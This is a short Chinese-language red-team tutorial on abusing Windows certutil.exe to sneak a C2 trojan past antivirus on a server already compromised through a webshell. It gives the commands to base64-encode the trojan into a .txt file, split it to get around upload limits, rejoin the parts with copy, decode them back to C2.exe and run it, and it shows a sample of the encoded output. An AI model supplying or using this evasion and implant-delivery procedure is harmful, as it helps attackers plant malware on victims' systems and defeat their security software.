实战攻防演练--利用微软自带Certutil命令ByPassAV上传C2

Certutil

Certutil.exe是Windows操作系统中的合法程序，主要用于管理证书相关操作。它提供了转储和显示证书颁发机构（CA）的配置信息、配置证书服务、备份和还原CA组件，以及验证证书、密钥对和证书链等功能，然而，由于其功能强大，很多攻击者滥用Certutil.exe程序将其用于攻击辅助，常用于远程下载，但不知道它还能加密解密本地文件（不会报毒，可以用来ByPassAV）

实战使用前提

在实战中有一种这有的场景，通过前期打点获取到了网站的入口，上传webshell拿下服务器网站权限，WebShell只能上传写入，有杀软和网站限制，只能上传txt，这种情况我就通过本次实战案例，给大家演示一下整个ByPass过程

加密exe格式木马为txt格式

首先，使用viper平台准备好C2木马，这里通过 Certutil -encode 1.exe 1.txt 命令进行加密导出，这里会修改exe格式为txt， 同时我们通过type查看命令，查看1.txt，看到文件有如下特征

Certutil 加密导出的特征

-----BEGIN CERTIFICATE-----
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v
dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA5JBHdfUV/jn1Ff459RX+O
WoMEjn5Ff459RX6Of0V/jnQ96o58RX+OdD3ujnxFf45SaWNofUV/jgAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA==
-----END CERTIFICATE-----

切割TXT文件并拼接、解密

由于某些场景会限制文件上传大小，没办法通过WebShell上传写入，可以通过将txt切割分为多个后上传

新建一个文件夹，全部上传，上传后目录如下所示

使用copy命令执行copy 001.txt + 002.txt + 003.txt + 004.txt 2.txt 将txt合并，按顺序拼接为2.txt，这里拼接后的2.txt文件内容与加密的1.txt一致

之后我们将加密导出的 2.txt 用 Certutil 进行解密操作，执行Certutil -decode 2.txt C2.exe 命令后，还原为我们的C2木马

如下图所示，已经还原为C2木马，我们执行，查看是否可以上线

到此一步已经完成上线，可进行后续操作